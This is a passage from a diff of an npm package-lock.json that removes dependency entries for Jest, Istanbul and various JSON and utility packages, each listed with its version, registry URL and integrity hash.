"sha512-2SPlun1JUPWoM6t3F0dw0FkCF/jWY8kttcY4f599GLTSjh2OCuuhdTkJQsEcZzBqbXZGKMK2OqW1oZsjtf/gQA==", - "dev": true, - "requires": { - "pkg-dir": "^4.2.0", - "resolve-cwd": "^3.0.0" - } - }, - "imurmurhash": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", - "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", - "dev": true - }, - "inflight": { - "version": "1.0.6", - "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", - "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", - "dev": true, - "requires": { - "once": "^1.3.0", - "wrappy": "1" - } - }, - "inherits": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", - "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==", - "dev": true - }, - "is-arrayish": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/is-arrayish/-/is-arrayish-0.2.1.tgz", - "integrity": "sha512-zz06S8t0ozoDXMG+ube26zeCTNXcKIPJZJi8hBrF4idCLms4CG9QtK7qBl1boi5ODzFpjswb5JPmHCbMpjaYzg==", - "dev": true - }, - "is-core-module": { - "version": "2.15.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.15.1.tgz", - "integrity": "sha512-z0vtXSwucUJtANQWldhbtbt7BnL0vxiFjIdDLAatwhDYty2bad6s+rijD6Ri4YuYJubLzIJLUidCh09e1djEVQ==", - "dev": true, - "requires": { - "hasown": "^2.0.2" - } - }, - "is-fullwidth-code-point": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", - "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==" - }, - "is-generator-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/is-generator-fn/-/is-generator-fn-2.1.0.tgz", - "integrity": "sha512-cTIB4yPYL/Grw0EaSzASzg6bBy9gqCofvWN8okThAYIxKJZC+udlRAmGbM0XLeniEJSs8uEgHPGuHSe1XsOLSQ==", - "dev": true - }, - "is-number": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz", - "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==", - "dev": true - }, - "is-stream": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-2.0.1.tgz", - "integrity": "sha512-hFoiJiTl63nn+kstHGBtewWSKnQLpyb155KHheA1l39uvtO9nWIop1p3udqPcUd/xbF1VLMO4n7OI6p7RbngDg==", - "dev": true - }, - "is-typedarray": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/is-typedarray/-/is-typedarray-1.0.0.tgz", - "integrity": "sha1-5HnICFjfDBsR3dppQPlgEfzaSpo=" - }, - "isexe": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", - "integrity": "sha1-6PvzdNxVb/iUehDcsFctYz8s+hA=" - }, - "isomorphic-ws": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/isomorphic-ws/-/isomorphic-ws-5.0.0.tgz", - "integrity": "sha512-muId7Zzn9ywDsyXgTIafTry2sV3nySZeUDe6YedVd1Hvuuep5AsIlqK+XefWpYTyJG5e503F2xIuT2lcU6rCSw==", - "requires": {} - }, - "isstream": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz", - "integrity": "sha1-R+Y/evVa+m+S4VAOaQ64uFKcCZo=" - }, - "istanbul-lib-coverage": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/istanbul-lib-coverage/-/istanbul-lib-coverage-3.2.2.tgz", - "integrity": "sha512-O8dpsF+r0WV/8MNRKfnmrtCWhuKjxrq2w+jpzBL5UZKTi2LeVWnWOmWRxFlesJONmc+wLAGvKQZEOanko0LFTg==", - "dev": true - }, - "istanbul-lib-instrument": { - "version": "6.0.3", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.3.tgz", - "integrity": "sha512-Vtgk7L/R2JHyyGW07spoFlB8/lpjiOLTjMdms6AFMraYt3BaJauod/NGrfnVG/y4Ix1JEuMRPDPEj2ua+zz1/Q==", - "dev": true, - "requires": { - "@babel/core": "^7.23.9", - "@babel/parser": "^7.23.9", - "@istanbuljs/schema": "^0.1.3", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^7.5.4" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "istanbul-lib-report": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-report/-/istanbul-lib-report-3.0.1.tgz", - "integrity": "sha512-GCfE1mtsHGOELCU8e/Z7YWzpmybrx/+dSTfLrvY8qRmaY6zXTKWn6WQIjaAFw069icm6GVMNkgu0NzI4iPZUNw==", - "dev": true, - "requires": { - "istanbul-lib-coverage": "^3.0.0", - "make-dir": "^4.0.0", - "supports-color": "^7.1.0" - } - }, - "istanbul-lib-source-maps": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-source-maps/-/istanbul-lib-source-maps-4.0.1.tgz", - "integrity": "sha512-n3s8EwkdFIJCG3BPKBYvskgXGoy88ARzvegkitk60NxRdwltLOTaH7CUiMRXvwYorl0Q712iEjcWB+fK/MrWVw==", - "dev": true, - "requires": { - "debug": "^4.1.1", - "istanbul-lib-coverage": "^3.0.0", - "source-map": "^0.6.1" - } - }, - "istanbul-reports": { - "version": "3.1.7", - "resolved": "https://registry.npmjs.org/istanbul-reports/-/istanbul-reports-3.1.7.tgz", - "integrity": "sha512-BewmUXImeuRk2YY0PVbxgKAysvhRPUQE0h5QRM++nVWyubKGV0l8qQ5op8+B2DOmwSe63Jivj0BjkPQVf8fP5g==", - "dev": true, - "requires": { - "html-escaper": "^2.0.0", - "istanbul-lib-report": "^3.0.0" - } - }, - "jackspeak": { - "version": "3.4.3", - "resolved": "https://registry.npmjs.org/jackspeak/-/jackspeak-3.4.3.tgz", - "integrity": "sha512-OGlZQpz2yfahA/Rd1Y8Cd9SIEsqvXkLVoSw/cgwhnhFMDbsQFeZYoJJ7bIZBS9BcamUW96asq/npPWugM+RQBw==", - "requires": { - "@isaacs/cliui": "^8.0.2", - "@pkgjs/parseargs": "^0.11.0" - } - }, - "jake": { - "version": "10.9.2", - "resolved": "https://registry.npmjs.org/jake/-/jake-10.9.2.tgz", - "integrity": "sha512-2P4SQ0HrLQ+fw6llpLnOaGAvN2Zu6778SJMrCUwns4fOoG9ayrTiZk3VV8sCPkVZF8ab0zksVpS8FDY5pRCNBA==", - "dev": true, - "requires": { - "async": "^3.2.3", - "chalk": "^4.0.2", - "filelist": "^1.0.4", - "minimatch": "^3.1.2" - } - }, - "jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest/-/jest-29.7.0.tgz", - "integrity": "sha512-NIy3oAFp9shda19hy4HK0HRTWKtPJmGdnvywu01nOqNC2vZg+Z+fvJDxpMQA88eb2I9EcafcdjYgsDthnYTvGw==", - "dev": true, - "requires": { - "@jest/core": "^29.7.0", - "@jest/types": "^29.6.3", - "import-local": "^3.0.2", - "jest-cli": "^29.7.0" - } - }, - "jest-changed-files": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.7.0.tgz", - "integrity": "sha512-fEArFiwf1BpQ+4bXSprcDc3/x4HSzL4al2tozwVpDFpsxALjLYdyiIK4e5Vz66GQJIbXJ82+35PtysofptNX2w==", - "dev": true, - "requires": { - "execa": "^5.0.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0" - } - }, - "jest-circus": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.7.0.tgz", - "integrity": "sha512-3E1nCMgipcTkCocFwM90XXQab9bS+GMsjdpmPrlelaxwD93Ad8iVEjX/vvHPdLPnFf+L40u+5+iutRdA1N9myw==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/expect": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^1.0.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.7.0", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "p-limit": "^3.1.0", - "pretty-format": "^29.7.0", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-cli": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.7.0.tgz", - "integrity": "sha512-OVVobw2IubN/GSYsxETi+gOe7Ka59EFMR/twOU3Jb2GnKKeMGJB5SGUUrEz3SFVmJASUdZUzy83sLNNQ2gZslg==", - "dev": true, - "requires": { - "@jest/core": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "create-jest": "^29.7.0", - "exit": "^0.1.2", - "import-local": "^3.0.2", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "yargs": "^17.3.1" - } - }, - "jest-config": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.7.0.tgz", - "integrity": "sha512-uXbpfeQ7R6TZBqI3/TxCU4q4ttk3u0PJeC+E0zbfSoSjq6bJ7buBPxzQPL0ifrkY4DNu4JUdk0ImlBUYi840eQ==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-jest": "^29.7.0", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-runner": "^29.7.0", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - } - }, - "jest-diff": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.7.0.tgz", - "integrity": "sha512-LMIgiIrhigmPrs03JHpxUh2yISK3vLFPkAodPeo0+BuF7wA2FoQbkEg1u8gBYBThncu7e1oEDUfIXVuTqLRUjw==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "diff-sequences": "^29.6.3", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-docblock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.7.0.tgz", - "integrity": "sha512-q617Auw3A612guyaFgsbFeYpNP5t2aoUNLwBUbc/0kD1R4t9ixDbyFTHd1nok4epoVFpr7PmeWHrhvuV3XaJ4g==", - "dev": true, - "requires": { - "detect-newline": "^3.0.0" - } - }, - "jest-each": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.7.0.tgz", - "integrity": "sha512-gns+Er14+ZrEoC5fhOfYCY1LOHHr0TI+rQUHZS8Ttw2l7gl+80eHc/gFf2Ktkw0+SIACDTeWvpFcv3B04VembQ==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "jest-util": "^29.7.0", - "pretty-format": "^29.7.0" - } - }, - "jest-environment-node": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.7.0.tgz", - "integrity": "sha512-DOSwCRqXirTOyheM+4d5YZOrWcdu0LNZ87ewUoywbcb2XR4wKgqiG8vNeYwhjFMbEkfju7wx2GYH0P2gevGvFw==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-mock": "^29.7.0", - "jest-util": "^29.7.0" - } - }, - "jest-get-type": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.6.3.tgz", - "integrity": "sha512-zrteXnqYxfQh7l5FHyL38jL39di8H8rHoecLH3JNxH3BwOrBsNeabdap5e0I23lD4HHI8W5VFBZqG4Eaq5LNcw==", - "dev": true - }, - "jest-haste-map": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.7.0.tgz", - "integrity": "sha512-fP8u2pyfqx0K1rGn1R9pyE0/KTn+G7PxktWidOBTqFPLYX0b9ksaMFkhK5vrS3DVun09pckLdlx90QthlW7AmA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.6.3", - "jest-util": "^29.7.0", - "jest-worker": "^29.7.0", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.7.0.tgz", - "integrity": "sha512-kYA8IJcSYtST2BY9I+SMC32nDpBT3J2NvWJx8+JCuCdl/CR1I4EKUJROiP8XtCcxqgTTBGJNdbB1A8XRKbTetw==", - "dev": true, - "requires": { - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-matcher-utils": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.7.0.tgz", - "integrity": "sha512-sBkD+Xi9DtcChsI3L3u0+N0opgPYnCRPtGcQYrgXmR+hmt/fYfWAL0xRXYU8eWOdfuLgBe0YCW3AFtnRLagq/g==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "pretty-format": "^29.7.0" - } - }, - "jest-message-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.7.0.tgz", - "integrity": "sha512-GBEV4GRADeP+qtB2+6u61stea8mGcOT4mCtrYISZwfu9/ISHFJ/5zOMXYbpBE9RsS5+Gb63DW4FgmnKJ79Kf6w==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.3", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.7.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.7.0.tgz", - "integrity": "sha512-ITOMZn+UkYS4ZFh83xYAOzWStloNzJFO2s8DWrE4lhtGD+AorgnbkiKERe4wQVBydIGPx059g6riW5Btp6Llnw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "jest-util": "^29.7.0" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-regex-util": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", - "dev": true - }, - "jest-resolve": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", - "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", - "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", - "dev": true, - "requires": { - "jest-regex-util": "^29.6.3", - "jest-snapshot": "^29.7.0" - } - }, - "jest-runner": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", - "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/environment": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-leak-detector": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-resolve": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-util": "^29.7.0", - "jest-watcher": "^29.7.0", - "jest-worker": "^29.7.0", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", - "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/globals": "^29.7.0", - "@jest/source-map": "^29.6.3", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", - "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "natural-compare": "^1.4.0", - "pretty-format": "^29.7.0", - "semver": "^7.5.3" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "jest-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", - "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", - "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "leven": "^3.1.0", - "pretty-format": "^29.7.0" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", - "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", - "dev": true, - "requires": { - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.7.0", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", - "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.7.0", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "jose": { - "version": "5.9.6", - "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", - "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "requires": { - "argparse": "^2.0.1" - } - }, - "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" - }, - "jsep": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", - "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==" - }, - "jsesc": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.0.2.tgz", - "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "jsonpath-plus": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", - "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", - "requires": { - "@jsep-plugin/assignment": "^1.3.0", - "@jsep-plugin/regex": "^1.0.4", - "jsep": "^1.4.0" - } - }, - "jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - } - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": 